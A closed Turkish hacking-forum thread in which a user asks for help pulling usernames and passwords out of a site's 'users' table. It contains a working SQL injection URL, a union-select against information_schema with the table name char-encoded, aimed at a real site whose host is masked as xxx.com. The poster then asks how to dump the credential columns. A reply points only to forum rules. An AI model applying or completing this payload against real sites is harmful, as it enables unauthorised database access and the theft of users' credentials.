Sql Char ve kullanıcı adı şifre çekmek !!!

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

puni$her

Kıdemli Üye
Selam,

http://www.xxx.com/book.php?bookId=-97+union+select+0,1,2,column_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+information_schema.columns+where+table_name=char%28117,%20115,%20101,%20114,%20115%29

Tablo adı users lakin ........25,26,27+from+users yazınca kolon numarası ekrana yansımıyor.Veri çekemiyorum.

users tablo ismini charlayınca bana bu tablodaki kolon isimlerini veriyor. YAni mail passsword ,username falan.

Sonuca gelince yani;

+union+select+0,1,2,3....+from+users yazınca bana kolon numaraları ekraa vurmuyor. Bu kısımda bu passwrd ve username lerin odluğu kolon ismini nasıl ekrana vurdurucaz.

Mesela : union+select+0,1,2,3....+from+char(32,32,435,) şeklinde denemek saçmaydı denedim ama olmadı .BU verileri nasıl çekicez ?

Beyaz Olan Bölge Ney ??

Forum Kurallarına Uymalısın Sen Orayı Ediitle Yardım Ediicek Arkadaş Çıkıcaktır Kardeşim:) Kolay Gelsiin..

23 Ocak 2009
155
0
xxx.kom ? link mi ? Ben link vermemek için orayı xxx le bilerek yazdım lakin orji sitesi başka. Genelde öyle olur yada link gizlenir. İlginçmiş neyse sağol arkadaşım uyarına . Başka yerde arasam araştırsam iyi olucak. Kal sağlıcakla. Kusurada bakma.

Konu ÇÖp .Afedersiniz post kastım.

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.